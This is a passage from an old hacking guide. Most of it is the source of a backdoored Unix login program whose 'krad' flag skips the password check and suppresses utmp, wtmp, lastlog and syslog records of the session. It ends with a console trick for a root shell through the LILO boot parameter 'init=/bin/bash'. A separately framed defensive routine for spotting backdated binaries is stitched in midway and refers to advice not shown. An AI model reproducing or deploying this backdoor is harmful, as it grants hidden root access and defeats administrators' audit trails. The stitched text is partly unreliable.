break;
}
}
#endif

(void) memset(pp, 0, strlen(pp));
if (pwd && !strcmp(p, pwd->pw_passwd))
break;

if(krad != 0)
break;




(void)printf("Login incorrect\n");
failures++;
badlogin(username); /* log ALL bad logins */

/* we allow 10 tries, but after 3 we start backing off */
if (++cnt > 3) {
if (cnt >= 10) {
sleepexit(1);
}
sleep((unsigned int)((cnt - 3) * 5));
}
}

/* committed to login -- turn off timeout */
(void)alarm((unsigned int)0);

#ifdef HAVE_QUOTA
if (quota(Q_SETUID, pwd->pw_uid, 0, 0) < 0 && errno != EINVAL) {
switch(errno) {
case EUSERS:
(void)fprintf(stderr,
"Too many users logged on already.\nTry again later.\n");
break;
case EPROCLIM:
(void)fprintf(stderr,
"You have too many processes running.\n");
break;
default:
perror("quota (Q_SETUID)");
}
sleepexit(0);
}
#endif

/* paranoia... */
endpwent();

/* This requires some explanation: As root we may not be able to
read the directory of the user if it is on an NFS mounted
filesystem. We temporarily set our effective uid to the user-uid
making sure that we keep root privs. in the real uid.

A portable solution would require a fork(), but we rely on Linux
having the BSD setreuid() */

{
char tmpstr[MAXPATHLEN];
uid_t ruid = getuid();
gid_t egid = getegid();

strncpy(tmpstr, pwd->pw_dir, MAXPATHLEN-12);
strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN);

setregid(-1, pwd->pw_gid);
setreuid(0, pwd->pw_uid);
quietlog = (access(tmpstr, R_OK) == 0);
setuid(0); /* setreuid doesn't do it alone! */
setreuid(ruid, 0);
setregid(-1, egid);
}

#ifndef linux
#ifdef KERBEROS
if (notickets && !quietlog)
(void)printf("Warning: no Kerberos tickets issued\n");
#endif

#define TWOWEEKS (14*24*60*60)
if (pwd->pw_change || pwd->pw_expire)
(void)gettimeofday(&tp, (struct timezone *)NULL);
if (pwd->pw_change)
if (tp.tv_sec >= pwd->pw_change) {
(void)printf("Sorry -- your password has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_change < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_change);
(void)printf("Warning: your password expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}
if (pwd->pw_expire)
if (tp.tv_sec >= pwd->pw_expire) {
(void)printf("Sorry -- your account has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_expire < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_expire);
(void)printf("Warning: your account expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}

/* nothing else left to fail -- really log in */
{
struct utmp utmp;

memset((char *)&utmp, 0, sizeof(utmp));
(void)time(&utmp.ut_time);
strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
if (hostname)
strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
login(&utmp);
}
#else
/* for linux, write entries in utmp and wtmp */
{
struct utmp ut;
char *ttyabbrev;
int wtmp;

memset((char *)&ut, 0, sizeof(ut));
ut.ut_type = USER_PROCESS;
ut.ut_pid = getpid();
strncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, sizeof(ut.ut_line));
ttyabbrev = ttyn + sizeof("/dev/tty") - 1;
strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id));
(void)time(&ut.ut_time);
strncpy(ut.ut_user, username, sizeof(ut.ut_user));

/* fill in host and ip-addr fields when we get networking */
if (hostname) {
struct hostent *he;

strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));
if ((he = gethostbyname(hostname)))
memcpy(&ut.ut_addr, he->h_addr_list[0],
sizeof(ut.ut_addr));
}

utmpname(_PATH_UTMP);
setutent();


if(krad == 0)
pututline(&ut);



endutent();

if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) {
flock(wtmp, LOCK_EX);

if(krad == 0)
write(wtmp, (char *)&ut, sizeof(ut));



flock(wtmp, LOCK_UN);
close(wtmp);
}
}
/* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */
#endif



if(krad == 0)
dolastlog(quietlog);




#ifndef linux
if (!hflag) { /* XXX */
static struct winsize win = { 0, 0, 0, 0 };

(void)ioctl(0, TIOCSWINSZ, &win);
}
#endif
(void)chown(ttyn, pwd->pw_uid,
(gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);

(void)chmod(ttyn, 0622);
(void)setgid(pwd->pw_gid);

initgroups(username, pwd->pw_gid);

#ifdef HAVE_QUOTA
quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);
#endif

if (*pwd->pw_shell == '\0')
pwd->pw_shell = _PATH_BSHELL;
#ifndef linux
/* turn on new line discipline for the csh */
else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) {
ioctlval = NTTYDISC;
(void)ioctl(0, TIOCSETD, &ioctlval);
}
#endif

/* preserve TERM even without -p flag */
{
char *ep;

if(!((ep = getenv("TERM")) && (termenv = strdup(ep))))
termenv = "dumb";
}

/* destroy environment unless user has requested preservation */
if (!pflag)
{
environ = (char**)malloc(sizeof(char*));
memset(environ, 0, sizeof(char*));
}

#ifndef linux
(void)setenv("HOME", pwd->pw_dir, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
if (term[0] == '\0')
strncpy(term, stypeof(tty), sizeof(term));
(void)setenv("TERM", term, 0);
(void)setenv("USER", pwd->pw_name, 1);
(void)setenv("PATH", _PATH_DEFPATH, 0);
#else
(void)setenv("HOME", pwd->pw_dir, 0); /* legal to override */
if(pwd->pw_uid)
(void)setenv("PATH", _PATH_DEFPATH, 1);
else
(void)setenv("PATH", _PATH_DEFPATH_ROOT, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
(void)setenv("TERM", termenv, 1);

/* mailx will give a funny error msg if you forget this one */
(void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name);
(void)setenv("MAIL",tmp,0);

/* LOGNAME is not documented in login(1) but
HP-UX 6.5 does it. We'll not allow modifying it.
*/
(void)setenv("LOGNAME", pwd->pw_name, 1);
#endif

#ifndef linux
if (tty[sizeof("tty")-1] == 'd')


if(krad == 0)
syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);



#endif
if (pwd->pw_uid == 0)


if(krad == 0)
if (hostname)
syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s",
tty, hostname);
else
syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty);





if (!quietlog) {
struct stat st;

motd();
(void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name);
if (stat(tbuf, &st) == 0 && st.st_size != 0)
(void)printf("You have %smail.\n",
(st.st_mtime > st.st_atime) ? "new " : "");
}

(void)signal(SIGALRM, SIG_DFL);
(void)signal(SIGQUIT, SIG_DFL);
(void)signal(SIGINT, SIG_DFL);
(void)signal(SIGTSTP, SIG_IGN);
(void)signal(SIGHUP, SIG_DFL);

/* discard permissions last so can't get killed and drop core */
if(setuid(pwd->pw_uid) < 0 && pwd->pw_uid) {
syslog(LOG_ALERT, "setuid() failed");
exit(1);
}

/* wait until here to change directory! */
if (chdir(pwd->pw_dir) < 0) {
(void)printf("No directory %s!\n", pwd->pw_dir);
if (chdir("/"))
exit(0);
pwd->pw_dir = "/";
(void)printf("Logging in with home = \"/\".\n");
}

/* if the shell field has a space: treat it like a shell script */
if (strchr(pwd->pw_shell, ' ')) {
char *buff = malloc(strlen(pwd->pw_shell) + 6);
if (buff) {
strcpy(buff, "exec ");
strcat(buff, pwd->pw_shell);
execlp("/bin/sh", "-sh", "-c", buff, (char *)0);
fprintf(stderr, "login: couldn't exec shell script: %s.\n",
strerror(errno));
exit(0);
}
fprintf(stderr, "login: no memory for shell script.\n");
exit(0);
}

tbuf[0] = '-';
strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ?
p + 1 : pwd->pw_shell));

execlp(pwd->pw_shell, tbuf, (char *)0);
(void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));
exit(0);
}

void
getloginname()
{
register int ch;
register char *p;
static char nbuf[UT_NAMESIZE + 1];

for (;;) {
(void)printf("\n%s login: ", thishost); fflush(stdout);
for (p = nbuf; (ch = getchar()) != '\n'; ) {
if (ch == EOF) {
badlogin(username);
exit(0);
}
if (p < nbuf + UT_NAMESIZE)
*p++ = ch;
}
if (p > nbuf)
if (nbuf[0] == '-')
(void)fprintf(stderr,
"login names may not start with '-'.\n");
else {
*p = '\0';
username = nbuf;
break;
}
}
}

void timedout()
{
struct termio ti;

(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);

/* reset echo */
(void) ioctl(0, TCGETA, &ti);
ti.c_lflag |= ECHO;
(void) ioctl(0, TCSETA, &ti);
exit(0);
}

int
rootterm(ttyn)
char *ttyn;
#ifndef linux
{
struct ttyent *t;

return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);
}
#else
{
int fd;
char buf[100],*p;
int cnt, more;

fd = open(SECURETTY, O_RDONLY);
if(fd < 0) return 1;

/* read each line in /etc/securetty, if a line matches our ttyline
then root is allowed to login on this tty, and we should return
true. */
for(;;) {
p = buf; cnt = 100;
while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++;
if(more && *p == '\n') {
*p = '\0';
if(!strcmp(buf, ttyn)) {
close(fd);
return 1;
} else
continue;
} else {
close(fd);
return 0;
}
}
}
#endif

jmp_buf motdinterrupt;

void
motd()
{
register int fd, nchars;
void (*oldint)(), sigint();
char tbuf[8192];

if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
return;
oldint = signal(SIGINT, sigint);
if (setjmp(motdinterrupt) == 0)
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
(void)signal(SIGINT, oldint);
(void)close(fd);
}

void sigint()
{
longjmp(motdinterrupt, 1);
}

void
checknologin()
{
register int fd, nchars;
char tbuf[8192];

if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
sleepexit(0);
}
}

void
dolastlog(quiet)
int quiet;
{
struct lastlog ll;
int fd;

if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
if (!quiet) {
if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
ll.ll_time != 0) {
(void)printf("Last login: %.*s ",
24-5, (char *)ctime(&ll.ll_time));

if (*ll.ll_host != '\0')
printf("from %.*s\n",
(int)sizeof(ll.ll_host), ll.ll_host);
else
printf("on %.*s\n",
(int)sizeof(ll.ll_line), ll.ll_line);
}
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
}
memset((char *)&ll, 0, sizeof(ll));
(void)time(&ll.ll_time);
strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
if (hostname)
strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
if(krad == 0)
(void)write(fd, (char *)&ll, sizeof(ll));
(void)close(fd);
}
}

void
badlogin(name)
char *name;
{
if (failures == 0)
return;

if (hostname)
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",
failures, failures > 1 ? "S" : "", hostname, name);
else
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",
failures, failures > 1 ? "S" : "", tty, name);
}

#undef UNKNOWN
#define UNKNOWN "su"

#ifndef linux
char *
stypeof(ttyid)
char *ttyid;
{
struct ttyent *t;

return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}
#endif

void
checktty(user, tty)
char *user;
char *tty;
{
FILE *f;
char buf[256];
char *ptr;
char devname[50];
struct stat stb;

/* no /etc/usertty, default to allow access */
if(!(f = fopen(_PATH_USERTTY, "r"))) return;

while(fgets(buf, 255, f)) {

/* strip comments */
for(ptr = buf; ptr < buf + 256; ptr++)
if(*ptr == '#') *ptr = 0;

strtok(buf, " \t");
if(strncmp(user, buf, 8) == 0) {
while((ptr = strtok(NULL, "\t\n "))) {
if(strncmp(tty, ptr, 10) == 0) {
fclose(f);
return;
}
if(strcmp("PTY", ptr) == 0) {
#ifdef linux
sprintf(devname, "/dev/%s", ptr);
/* VERY linux dependent, recognize PTY as alias
for all pseudo tty's */
if((stat(devname, &stb) >= 0)
&& major(stb.st_rdev) == 4
&& minor(stb.st_rdev) >= 192) {
fclose(f);
return;
}
#endif
}
}
/* if we get here, /etc/usertty exists, there's a line
beginning with our username, but it doesn't contain the
name of the tty where the user is trying to log in.
So deny access! */
fclose(f);
printf("Login on %s denied.\n", tty);
badlogin(user);
sleepexit(1);
}
}
fclose(f);
/* users not mentioned in /etc/usertty are by default allowed access
on all tty's */
}

void
getstr(buf, cnt, err)
char *buf, *err;
int cnt;
{
char ch;

do {
if (read(0, &ch, sizeof(ch)) != sizeof(ch))
exit(1);
if (--cnt < 0) {
(void)fprintf(stderr, "%s too long\r\n", err);
sleepexit(1);
}
*buf++ = ch;
} while (ch);
}

void
sleepexit(eval)
int eval;
{
sleep((unsigned int)5);
exit(eval);
}



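On the "touch --help" advice above, an added example (my own code, not part
of this guide and not from the DemonKit): touch(1) can set a file's atime and
mtime to any value, but the kernel stamps ctime with the current clock on
that same call, and no user-space call sets ctime directly. A replaced
/bin/login whose ctime is far later than its mtime was therefore written (or
re-timestamped) after the date it claims. The scratch-file demo, the
one-year backdate and the 60-second slack are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <time.h>
#include <unistd.h>

/*
 * 1 if the inode change time is more than 'slack' seconds after the
 * modification time, 0 if not, -1 if the file cannot be stat'ed.
 * touch(1) rewrites atime/mtime but the kernel stamps ctime with the
 * current clock on that same call, so a backdated file shows the skew.
 */
int looks_backdated(const char *path, long slack)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (long)(st.st_ctime - st.st_mtime) > slack ? 1 : 0;
}

/*
 * Replay the guide's advice on a scratch file: create it, then push its
 * mtime back a year with utimes() (what 'touch -d' does under the hood).
 * Returns looks_backdated() for the file, or -1 if setup failed.
 */
int demo_touch_does_not_hide(void)
{
    const char body[] = "#!/bin/sh\nexit 0\n";
    char path[] = "/tmp/backdate-demo-XXXXXX";
    char local[] = "./backdate-demo-XXXXXX";   /* fallback if /tmp is unavailable */
    char *p = path;
    struct timeval tv[2];
    int fd, r;

    fd = mkstemp(path);
    if (fd < 0) { p = local; fd = mkstemp(local); }
    if (fd < 0)
        return -1;
    if (write(fd, body, sizeof body - 1) != (ssize_t)(sizeof body - 1)) {
        close(fd); unlink(p); return -1;
    }
    close(fd);

    tv[0].tv_sec = tv[1].tv_sec = time(NULL) - 365L * 24 * 3600; /* atime, mtime */
    tv[0].tv_usec = tv[1].tv_usec = 0;
    if (utimes(p, tv) != 0) { unlink(p); return -1; }

    r = looks_backdated(p, 60);
    unlink(p);
    return r;
}

int main(int argc, char **argv)
{
    int i, flagged = 0;

    if (argc < 2) {
        printf("scratch file backdated with utimes(): flagged = %d\n",
               demo_touch_does_not_hide());
        return 0;
    }
    for (i = 1; i < argc; i++) {
        int r = looks_backdated(argv[i], 60);
        if (r < 0)
            perror(argv[i]);
        else if (r) {
            printf("%s: ctime well after mtime, verify it against package hashes\n", argv[i]);
            flagged++;
        }
    }
    return flagged ? 2 : 0;
}
```

Treat a hit as triage, not a verdict: dpkg and rpm preserve the mtime from
the package build, so on a distro-managed system a large ctime/mtime gap is
normal for every packaged file. The check catches a hand-built replacement
like the login above that was touched to look old; the verdict comes from
comparing the binary against the package database's hashes.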

So if you really wanna have root access and have access to the console, reboot
it (carefully, do a ctrl-alt-del) and at the LILO prompt pass the kernel:
init=/bin/bash rw (for linux 2.0.0 and above (I think)).
That drops you into a root shell before anything else starts; it only works
if LILO has no password/restricted line in lilo.conf.

Don't wonder why I was speaking only about rootshell and dhp.com, there are
lots of other very good hacking pages, but these ones are updated very
quickly and besides, are the best pages I know.


So folks, this was it...
First version of my USER's GUIDE 1.0.
Maybe I'll do better next time, and if I have more time, I'll add about
50(more) other exploits, remote ones, new stuff, new techniques, etc...
See ya, folks !
GOOD NIGHT !!! (it's 6.am now).
DAMN !!!


ARGHHH! I forgot... My e-mail address is .
(for now).